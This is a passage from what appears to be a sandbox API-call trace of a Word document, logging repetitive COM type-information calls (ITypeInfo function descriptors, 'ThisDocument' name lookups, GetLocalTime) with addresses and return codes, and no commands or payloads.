ppFuncDesc=0x186688, pDummy=0x100) returned 0x0 [0041.303] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.303] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xc6, ppFuncDesc=0x186688, pDummy=0x100 | out: ppFuncDesc=0x186688, pDummy=0x100) returned 0x0 [0041.303] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.303] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xc7, ppFuncDesc=0x186688, pDummy=0x100 | out: ppFuncDesc=0x186688, pDummy=0x100) returned 0x0 [0041.303] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.303] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xc8, ppFuncDesc=0x186688, pDummy=0x100 | out: ppFuncDesc=0x186688, pDummy=0x100) returned 0x0 [0041.303] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.303] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xc9, ppFuncDesc=0x186688, pDummy=0x100 | out: ppFuncDesc=0x186688, pDummy=0x100) returned 0x0 [0041.303] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.303] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xca, ppFuncDesc=0x186688, pDummy=0x100 | out: ppFuncDesc=0x186688, pDummy=0x100) returned 0x0 [0041.303] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.303] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xcb, ppFuncDesc=0x186688, pDummy=0x100 | out: ppFuncDesc=0x186688, pDummy=0x100) returned 0x0 [0041.303] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.303] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xcc, ppFuncDesc=0x186688, pDummy=0x100 | out: ppFuncDesc=0x186688, pDummy=0x100) returned 0x0 [0041.303] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.303] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xcd, ppFuncDesc=0x186688, pDummy=0x100 | out: ppFuncDesc=0x186688, pDummy=0x100) returned 0x0 [0041.303] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.303] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xce, ppFuncDesc=0x186688, pDummy=0x100 | out: ppFuncDesc=0x186688, pDummy=0x100) returned 0x0 [0041.303] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.303] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xcf, ppFuncDesc=0x186688, pDummy=0x100 | out: ppFuncDesc=0x186688, pDummy=0x100) returned 0x0 [0041.303] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.303] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xd0, ppFuncDesc=0x186688, pDummy=0x100 | out: ppFuncDesc=0x186688, pDummy=0x100) returned 0x0 [0041.303] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.303] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xd1, ppFuncDesc=0x186688, pDummy=0x100 | out: ppFuncDesc=0x186688, pDummy=0x100) returned 0x0 [0041.303] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.303] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xd2, ppFuncDesc=0x186688, pDummy=0x100 | out: ppFuncDesc=0x186688, pDummy=0x100) returned 0x0 [0041.303] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.303] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xd3, ppFuncDesc=0x186688, pDummy=0x100 | out: ppFuncDesc=0x186688, pDummy=0x100) returned 0x0 [0041.304] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.304] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xd4, ppFuncDesc=0x186688, pDummy=0x100 | out: ppFuncDesc=0x186688, pDummy=0x100) returned 0x0 [0041.304] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.304] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xd5, ppFuncDesc=0x186688, pDummy=0x100 | out: ppFuncDesc=0x186688, pDummy=0x100) returned 0x0 [0041.304] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.304] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xd6, ppFuncDesc=0x186688, pDummy=0x100 | out: ppFuncDesc=0x186688, pDummy=0x100) returned 0x0 [0041.304] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.304] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xd7, ppFuncDesc=0x186688, pDummy=0x100 | out: ppFuncDesc=0x186688, pDummy=0x100) returned 0x0 [0041.304] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.304] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xd8, ppFuncDesc=0x186688, pDummy=0x140 | out: ppFuncDesc=0x186688, pDummy=0x140) returned 0x0 [0041.304] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.304] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xd9, ppFuncDesc=0x186688, pDummy=0x100 | out: ppFuncDesc=0x186688, pDummy=0x100) returned 0x0 [0041.304] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.304] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xda, ppFuncDesc=0x186688, pDummy=0x100 | out: ppFuncDesc=0x186688, pDummy=0x100) returned 0x0 [0041.304] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.304] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xdb, ppFuncDesc=0x186688, pDummy=0x100 | out: ppFuncDesc=0x186688, pDummy=0x100) returned 0x0 [0041.304] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.304] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xdc, ppFuncDesc=0x186688, pDummy=0x100 | out: ppFuncDesc=0x186688, pDummy=0x100) returned 0x0 [0041.304] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.304] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xdd, ppFuncDesc=0x186688, pDummy=0x100 | out: ppFuncDesc=0x186688, pDummy=0x100) returned 0x0 [0041.304] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.304] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xde, ppFuncDesc=0x186688, pDummy=0x100 | out: ppFuncDesc=0x186688, pDummy=0x100) returned 0x0 [0041.304] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.304] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xdf, ppFuncDesc=0x186688, pDummy=0x100 | out: ppFuncDesc=0x186688, pDummy=0x100) returned 0x0 [0041.304] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.304] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xe0, ppFuncDesc=0x186688, pDummy=0x100 | out: ppFuncDesc=0x186688, pDummy=0x100) returned 0x0 [0041.304] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.304] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xe1, ppFuncDesc=0x186688, pDummy=0x100 | out: ppFuncDesc=0x186688, pDummy=0x100) returned 0x0 [0041.304] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.304] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xe2, ppFuncDesc=0x186688, pDummy=0x100 | out: ppFuncDesc=0x186688, pDummy=0x100) returned 0x0 [0041.304] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.304] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xe3, ppFuncDesc=0x186688, pDummy=0x100 | out: ppFuncDesc=0x186688, pDummy=0x100) returned 0x0 [0041.304] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.304] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xe4, ppFuncDesc=0x186688, pDummy=0x100 | out: ppFuncDesc=0x186688, pDummy=0x100) returned 0x0 [0041.304] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.304] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xe5, ppFuncDesc=0x186688, pDummy=0x100 | out: ppFuncDesc=0x186688, pDummy=0x100) returned 0x0 [0041.304] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.304] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xe6, ppFuncDesc=0x186688, pDummy=0x100 | out: ppFuncDesc=0x186688, pDummy=0x100) returned 0x0 [0041.304] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.304] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xe7, ppFuncDesc=0x186688, pDummy=0x100 | out: ppFuncDesc=0x186688, pDummy=0x100) returned 0x0 [0041.304] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.304] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xe8, ppFuncDesc=0x186688, pDummy=0x100 | out: ppFuncDesc=0x186688, pDummy=0x100) returned 0x0 [0041.305] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.305] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xe9, ppFuncDesc=0x186688, pDummy=0x100 | out: ppFuncDesc=0x186688, pDummy=0x100) returned 0x0 [0041.305] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.305] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xea, ppFuncDesc=0x186688, pDummy=0x100 | out: ppFuncDesc=0x186688, pDummy=0x100) returned 0x0 [0041.305] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.305] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xeb, ppFuncDesc=0x186688, pDummy=0x100 | out: ppFuncDesc=0x186688, pDummy=0x100) returned 0x0 [0041.305] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.305] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xec, ppFuncDesc=0x186688, pDummy=0x100 | out: ppFuncDesc=0x186688, pDummy=0x100) returned 0x0 [0041.305] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.305] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xed, ppFuncDesc=0x186688, pDummy=0x100 | out: ppFuncDesc=0x186688, pDummy=0x100) returned 0x0 [0041.305] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.305] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xee, ppFuncDesc=0x186688, pDummy=0x100 | out: ppFuncDesc=0x186688, pDummy=0x100) returned 0x0 [0041.305] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.305] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xef, ppFuncDesc=0x186688, pDummy=0x100 | out: ppFuncDesc=0x186688, pDummy=0x100) returned 0x0 [0041.305] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.305] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xf0, ppFuncDesc=0x186688, pDummy=0x100 | out: ppFuncDesc=0x186688, pDummy=0x100) returned 0x0 [0041.305] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.305] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xf1, ppFuncDesc=0x186688, pDummy=0x100 | out: ppFuncDesc=0x186688, pDummy=0x100) returned 0x0 [0041.305] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.305] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xf2, ppFuncDesc=0x186688, pDummy=0x100 | out: ppFuncDesc=0x186688, pDummy=0x100) returned 0x0 [0041.305] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.305] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xf3, ppFuncDesc=0x186688, pDummy=0x140 | out: ppFuncDesc=0x186688, pDummy=0x140) returned 0x0 [0041.305] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.305] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xf4, ppFuncDesc=0x186688, pDummy=0x100 | out: ppFuncDesc=0x186688, pDummy=0x100) returned 0x0 [0041.305] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.305] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xf5, ppFuncDesc=0x186688, pDummy=0x100 | out: ppFuncDesc=0x186688, pDummy=0x100) returned 0x0 [0041.305] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.305] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xf6, ppFuncDesc=0x186688, pDummy=0x140 | out: ppFuncDesc=0x186688, pDummy=0x140) returned 0x0 [0041.305] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.305] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xf7, ppFuncDesc=0x186688, pDummy=0x100 | out: ppFuncDesc=0x186688, pDummy=0x100) returned 0x0 [0041.305] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.305] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xf8, ppFuncDesc=0x186688, pDummy=0x100 | out: ppFuncDesc=0x186688, pDummy=0x100) returned 0x0 [0041.305] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.306] ITypeInfo2:GetCustData (in: This=0x6a86060, GUID=0x7fee45dd970*(Data1=0xba65d790, Data2=0x9301, Data3=0x11cf, Data4=([0]=0x8d, [1]=0x22, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x37, [6]=0x53, [7]=0x84)), pVarVal=0x1866b8 | out: pVarVal=0x1866b8*(varType=0x0, wReserved1=0x0, wReserved2=0x1b8, wReserved3=0x0, varVal1=0x0, varVal2=0x800000000)) returned 0x0 [0041.306] IUnknown:Release (This=0x6a86060) returned 0x2 [0041.306] ITypeInfo:RemoteGetDocumentation (in: This=0x6a86060, memid=-1, refPtrFlags=0x1866b0, pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x0 | out: pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x0) returned 0x0 [0041.306] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Document", cchWideChar=9, lpMultiByteStr=0x1865c0, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Document", lpUsedDefaultChar=0x0) returned 9 [0041.306] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Document") returned 0x10d36a [0041.306] IMalloc:Realloc (This=0x7feffc15380, pv=0x6c13fe0, cb=0x62) returned 0x6c6a180 [0041.306] ITypeInfo:GetRefTypeOfImplType (in: This=0x6a86110, index=0x0, pRefType=0x1868d8 | out: pRefType=0x1868d8*=0x3) returned 0x0 [0041.306] ITypeInfo:GetRefTypeInfo (in: This=0x6a86110, hreftype=0x3, ppTInfo=0x1868e8 | out: ppTInfo=0x1868e8*=0x6bbd1c8) returned 0x0 [0041.307] IUnknown:Release (This=0x6a86110) returned 0x2 [0041.307] ITypeInfo:RemoteGetTypeAttr (in: This=0x6bbd1c8, ppTypeAttr=0x1868e0, pDummy=0x1868b8 | out: ppTypeAttr=0x1868e0, pDummy=0x1868b8*=0x3) returned 0x0 [0041.307] ITypeInfo:LocalReleaseTypeAttr (This=0x6bbd1c8) returned 0x0 [0041.307] ITypeInfo:GetRefTypeOfImplType (in: This=0x6bbd1c8, index=0x0, pRefType=0x1868d8 | out: pRefType=0x1868d8*=0x182) returned 0x0 [0041.307] ITypeInfo:GetRefTypeInfo (in: This=0x6bbd1c8, hreftype=0x182, ppTInfo=0x1868e8 | out: ppTInfo=0x1868e8*=0x6bbd220) returned 0x0 [0041.307] IUnknown:Release (This=0x6bbd1c8) returned 0x1 [0041.307] ITypeInfo:RemoteGetTypeAttr (in: This=0x6bbd220, ppTypeAttr=0x1868e0, pDummy=0x1868c0 | out: ppTypeAttr=0x1868e0, pDummy=0x1868c0*=0x1868f0) returned 0x0 [0041.307] ITypeInfo:LocalReleaseTypeAttr (This=0x6bbd220) returned 0x0 [0041.307] IUnknown:Release (This=0x6bbd220) returned 0x1 [0041.307] IUnknown:Release (This=0x6a86110) returned 0x1 [0041.307] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="055de83298", cchWideChar=11, lpMultiByteStr=0x1868d0, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="055de83298", lpUsedDefaultChar=0x0) returned 11 [0041.307] GetLocalTime (in: lpSystemTime=0x1869b8 | out: lpSystemTime=0x1869b8*(wYear=0x7e2, wMonth=0xc, wDayOfWeek=0x4, wDay=0x6, wHour=0x16, wMinute=0x1a, wSecond=0x20, wMilliseconds=0x327)) [0041.307] _ultow_s (in: _Value=0x5de83298, _Buffer=0x6c8b964, _BufferCount=0x9, _Radix=16 | out: _Buffer="5de83298") returned 0x0 [0041.307] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="065de83298", cchWideChar=11, lpMultiByteStr=0x186910, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="065de83298", lpUsedDefaultChar=0x0) returned 11 [0041.307] ITypeInfo:RemoteGetTypeAttr (in: This=0x6a86110, ppTypeAttr=0x186968, pDummy=0x69d77b0 | out: ppTypeAttr=0x186968, pDummy=0x69d77b0*=0x7) returned 0x0 [0041.307] ITypeInfo:RemoteGetTypeAttr (in: This=0x6a86110, ppTypeAttr=0x186910, pDummy=0x69d77b0 | out: ppTypeAttr=0x186910, pDummy=0x69d77b0*=0x7) returned 0x0 [0041.307] ITypeInfo:LocalReleaseTypeAttr (This=0x6a86110) returned 0x0 [0041.307] ITypeInfo:LocalReleaseTypeAttr (This=0x6a86110) returned 0x0 [0041.307] IUnknown:Release (This=0x6a86110) returned 0x1 [0041.308] IMalloc:Realloc (This=0x7feffc15380, pv=0x6b9f8b0, cb=0x100) returned 0x6ba4500 [0041.308] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ThisDocument", cchWideChar=13, lpMultiByteStr=0x186750, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ThisDocument", lpUsedDefaultChar=0x0) returned 13 [0041.308] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ThisDocument") returned 0x109e3c [0041.308] IUnknown:Release (This=0x6a86110) returned 0x1 [0041.308] IUnknown:Release (This=0x6a86110) returned 0x1 [0041.308] IUnknown:QueryInterface (in: This=0x6a86060, riid=0x7fee45d5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x186510 | out: ppvObject=0x186510*=0x0) returned 0x80004002 [0041.308] IUnknown:QueryInterface (in: This=0x6a86060, riid=0x7fee45d40f0*(Data1=0x20412, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x186458 | out: ppvObject=0x186458*=0x6a86060) returned 0x0 [0041.308] ITypeInfo2:GetCustData (in: This=0x6a86060, GUID=0x7fee45dd970*(Data1=0xba65d790, Data2=0x9301, Data3=0x11cf, Data4=([0]=0x8d, [1]=0x22, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x37, [6]=0x53, [7]=0x84)), pVarVal=0x186468 | out: pVarVal=0x186468*(varType=0x0, wReserved1=0x18, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x800000000)) returned 0x0 [0041.308] IUnknown:Release (This=0x6a86060) returned 0x2 [0041.308] ITypeInfo:RemoteGetDocumentation (in: This=0x6a86060, memid=-1, refPtrFlags=0x186460, pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x186480 | out: pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x186480*="") returned 0x0 [0041.308] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Document", cchWideChar=9, lpMultiByteStr=0x186370, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Document", lpUsedDefaultChar=0x0) returned 9 [0041.308] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Document") returned 0x10d36a [0041.309] ITypeInfo:RemoteGetTypeAttr (in: This=0x6a86110, ppTypeAttr=0x186460, pDummy=0x0 | out: ppTypeAttr=0x186460, pDummy=0x0) returned 0x0 [0041.309] ITypeInfo:LocalReleaseTypeAttr (This=0x6a86110) returned 0x0 [0041.309] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x0, ppFuncDesc=0x186438, pDummy=0xf0 | out: ppFuncDesc=0x186438, pDummy=0xf0) returned 0x0 [0041.309] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.309] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x1, ppFuncDesc=0x186438, pDummy=0xf0 | out: ppFuncDesc=0x186438, pDummy=0xf0) returned 0x0 [0041.309] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.309] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x2, ppFuncDesc=0x186438, pDummy=0xf0 | out: ppFuncDesc=0x186438, pDummy=0xf0) returned 0x0 [0041.309] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.309] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x3, ppFuncDesc=0x186438, pDummy=0xf0 | out: ppFuncDesc=0x186438, pDummy=0xf0) returned 0x0 [0041.309] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.309] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x4, ppFuncDesc=0x186438, pDummy=0xf0 | out: ppFuncDesc=0x186438, pDummy=0xf0) returned 0x0 [0041.309] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.309] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x5, ppFuncDesc=0x186438, pDummy=0xf0 | out: ppFuncDesc=0x186438, pDummy=0xf0) returned 0x0 [0041.309] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.309] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x6, ppFuncDesc=0x186438, pDummy=0xf0 | out: ppFuncDesc=0x186438, pDummy=0xf0) returned 0x0 [0041.309] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.309] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x7, ppFuncDesc=0x186438, pDummy=0xf0 | out: ppFuncDesc=0x186438, pDummy=0xf0) returned 0x0 [0041.309] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.309] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x8, ppFuncDesc=0x186438, pDummy=0xf0 | out: ppFuncDesc=0x186438, pDummy=0xf0) returned 0x0 [0041.309] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.309] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x9, ppFuncDesc=0x186438, pDummy=0xf0 | out: ppFuncDesc=0x186438, pDummy=0xf0) returned 0x0 [0041.309] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.309] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xa, ppFuncDesc=0x186438, pDummy=0xf0 | out: ppFuncDesc=0x186438, pDummy=0xf0) returned 0x0 [0041.309] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.309] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xb, ppFuncDesc=0x186438, pDummy=0xf0 | out: ppFuncDesc=0x186438, pDummy=0xf0) returned 0x0 [0041.309] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.309] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xc, ppFuncDesc=0x186438, pDummy=0xf0 | out: ppFuncDesc=0x186438, pDummy=0xf0) returned 0x0 [0041.309] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.309] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xd, ppFuncDesc=0x186438, pDummy=0xf0 | out: ppFuncDesc=0x186438, pDummy=0xf0) returned 0x0 [0041.309] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.309] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xe, ppFuncDesc=0x186438, pDummy=0xf0 | out: ppFuncDesc=0x186438, pDummy=0xf0) returned 0x0 [0041.309] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.309] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xf, ppFuncDesc=0x186438, pDummy=0xf0 | out: ppFuncDesc=0x186438, pDummy=0xf0) returned 0x0 [0041.309] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.309] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x10, ppFuncDesc=0x186438, pDummy=0xf0 | out: ppFuncDesc=0x186438, pDummy=0xf0) returned 0x0 [0041.309] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.309] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x11, ppFuncDesc=0x186438, pDummy=0xf0 | out: ppFuncDesc=0x186438, pDummy=0xf0) returned 0x0 [0041.309] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.309] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x12, ppFuncDesc=0x186438, pDummy=0xf0 | out: ppFuncDesc=0x186438, pDummy=0xf0) returned 0x0 [0041.309] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.310] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x13, ppFuncDesc=0x186438, pDummy=0xf0 | out: ppFuncDesc=0x186438, pDummy=0xf0) returned 0x0 [0041.310] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.310] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x14, ppFuncDesc=0x186438, pDummy=0xf0 | out: ppFuncDesc=0x186438, pDummy=0xf0) returned 0x0 [0041.310] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.310] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x15, ppFuncDesc=0x186438, pDummy=0xf0 | out: ppFuncDesc=0x186438, pDummy=0xf0) returned 0x0 [0041.310] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.310] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x16, ppFuncDesc=0x186438, pDummy=0xf0 | out: ppFuncDesc=0x186438, pDummy=0xf0) returned 0x0 [0041.310] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.310] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x17, ppFuncDesc=0x186438, pDummy=0xf0 | out: ppFuncDesc=0x186438, pDummy=0xf0) returned 0x0 [0041.310] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.310] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x18, ppFuncDesc=0x186438, pDummy=0xf0 | out: ppFuncDesc=0x186438, pDummy=0xf0) returned 0x0 [0041.310] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.310] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x19, 